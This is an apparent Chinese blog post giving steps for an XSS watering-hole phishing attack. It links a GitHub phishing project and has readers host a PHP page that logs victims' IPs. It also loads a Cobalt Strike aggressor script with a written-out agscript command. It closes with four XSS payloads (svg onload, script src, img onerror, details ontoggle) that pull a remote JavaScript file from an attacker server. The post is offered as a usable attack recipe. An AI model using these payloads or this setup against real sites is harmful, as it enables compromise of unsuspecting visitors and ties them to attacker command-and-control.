XSS水坑钓鱼

一、github的项目下载地址

https://github.com/timwhitez/Doge-XSS-Phishing

二、vps的web目录

在根目录上传bobo.php页面
在php根目录新建botIPs.txt(名字可在bobo.php中进行修改)文件用于存储已上线ip

三、修改test.js的内容

四、修改sendip.cna的内容

并在cobaltstrike中加载该插件

nohup ./agscript [ip] [port] [username] [password] sendip.cna &

五、将test.js插入xss处即可

这里放入结果远程加载js的标签，具体xss bypass在xss章节讨论

<svg onload="$.getScript`http://10.0.0.225/test2.js`" stype="display:none">
<script src=http://10.0.0.225/test2.js></script>
<img src=x onerror=$.getScript('http://10.0.0.225/test2.js')>
<details ontoggle="$.getScript`http://10.0.0.225/test2.js`">123</details>

posted @ 2021-06-29 23:31 Ctrl_C+Ctrl_V 阅读(434) 评论(2) 收藏举报

刷新页面返回顶部

Loading

Ctrl_C+Ctrl_V's Blog

XSS水坑钓鱼

一、github的项目下载地址

二、vps的web目录

三、修改test.js的内容

四、修改sendip.cna的内容

五、将test.js插入xss处即可

公告